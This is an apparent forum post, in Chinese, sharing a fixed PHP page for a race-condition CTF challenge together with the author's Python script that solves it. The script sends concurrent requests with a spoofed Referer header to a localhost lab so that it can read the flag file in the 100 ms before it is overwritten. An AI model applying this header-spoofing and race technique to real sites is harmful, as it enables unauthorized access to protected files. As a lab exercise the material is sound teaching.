CTF题目的第二个文件好像有点小问题,$msg没有echo出来、mkdir()没有递归创建,稍微改动了下

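<?php
// CTF lab page. On a valid request it writes the flag to a file under the
// caller's upload directory, reports the path, waits 100 ms, then overwrites
// the file with "Too slow!". That short window is the intended puzzle; outside
// a lab, writing a secret to a web-reachable path would itself be the defect.
header("Content-type:text/html;charset=utf-8");

// Referer is a client-supplied header, so this gate is part of the puzzle and
// not an access control. `??` avoids the undefined-index warning when absent.
$referer = $_SERVER['HTTP_REFERER'] ?? null;
if ($referer !== null) {
    // Directory is keyed by the SHA-1 of the client address.
    $savepath = "uploads/" . sha1($_SERVER['REMOTE_ADDR']) . "/";
    if (!is_dir($savepath)) {
        // umask(0) makes mkdir() apply the mode exactly. 0755 instead of 0777:
        // only the PHP process needs write access to the upload tree.
        $oldmask = umask(0);
        mkdir($savepath, 0755, true);
        umask($oldmask);
    }

    // 'content' is only checked for presence; the written data is fixed below.
    $filename = $_GET['filename'] ?? null;
    $requested = $_GET['content'] ?? null;
    if ($filename && $requested) {
        // The name is joined onto a filesystem path, so accept a single plain
        // path component only: no separators, no leading dot (rules out "..",
        // dotfiles such as .htaccess) and no array-valued parameter.
        if (!is_string($filename) || preg_match('/\A[A-Za-z0-9_][A-Za-z0-9._-]{0,63}\z/', $filename) !== 1) {
            echo 'invalid filename';
        } else {
            $target = $savepath . $filename;
            $content = 'HRCTF{y0u_n4ed_f4st}   by:l1nk3r';
            if (file_put_contents($target, $content) === false) {
                // Do not announce a flag file that was never written.
                echo 'could not write file';
            } else {
                $msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($filename, ENT_QUOTES, 'UTF-8') . "";
                echo $msg;
                // Intended challenge window: the flag stays in place for 100 ms.
                usleep(100000);
                $content = "Too slow!";
                file_put_contents($target, $content);
            }
        }
    }
    print <<<EOT
<form action="" method="get">
<div class="form-group">
<label for="exampleInputEmail1">Filename</label>
<input type="text" class="form-control" name="filename" id="exampleInputEmail1" placeholder="Filename">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Content</label>
<input type="text" class="form-control" name="content" id="exampleInputPassword1" placeholder="Contont">
</div>
<button type="submit" class="btn btn-default">Submit</button>
</form>
EOT;
} else {
    echo 'you can not see this page';
}
?>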

再附一个自己写的垃圾脚本

import threading
import requests

# Endpoints of the local CTF lab instance (localhost only).
_LAB_ROOT = 'http://localhost/ctf'

# Page that writes the flag file and overwrites it shortly afterwards.
uplurl = _LAB_ROOT + '/uploadsomething.php?filename=flag&content=1'

# Static path of the written file. The directory name is presumably the
# sha1(REMOTE_ADDR) value the PHP page computes for the author's own client
# address, so it is specific to that setup.
resurl = _LAB_ROOT + '/uploads/363baea9cba210afac6d7a556fca596e30c46333/flag'

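class Access(threading.Thread):
    """Worker thread that issues `number` sequential GET requests to `url`.

    URLs containing 'uploadsomething' are requested with a Referer header
    (the PHP page only checks that the header is present) and the response is
    discarded. Any other URL is fetched and its body printed.
    """

    def __init__(self, number, url):
        super().__init__()
        self.number = number  # how many requests this thread sends
        self.url = url

    def run(self):
        if 'uploadsomething' in self.url:
            for _ in range(self.number):
                requests.get(self.url, headers={'Referer': 'Anything'})
        else:
            for _ in range(self.number):
                body = requests.get(self.url).content
                # Decode the bytes instead of str(bytes).replace('b', ''),
                # which left the repr quotes in place and also deleted every
                # literal 'b' from the text (e.g. "by:" became "y:").
                result = body.decode('utf-8', errors='replace') + '\n'
                print(result)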

# One thread requests the PHP page, the other reads the resulting file;
# each sends three requests.
up = Access(3, uplurl)
re = Access(3, resurl)

# Start both threads before waiting on either, so they run concurrently.
workers = (up, re)
for worker in workers:
    worker.start()
for worker in workers:
    worker.join()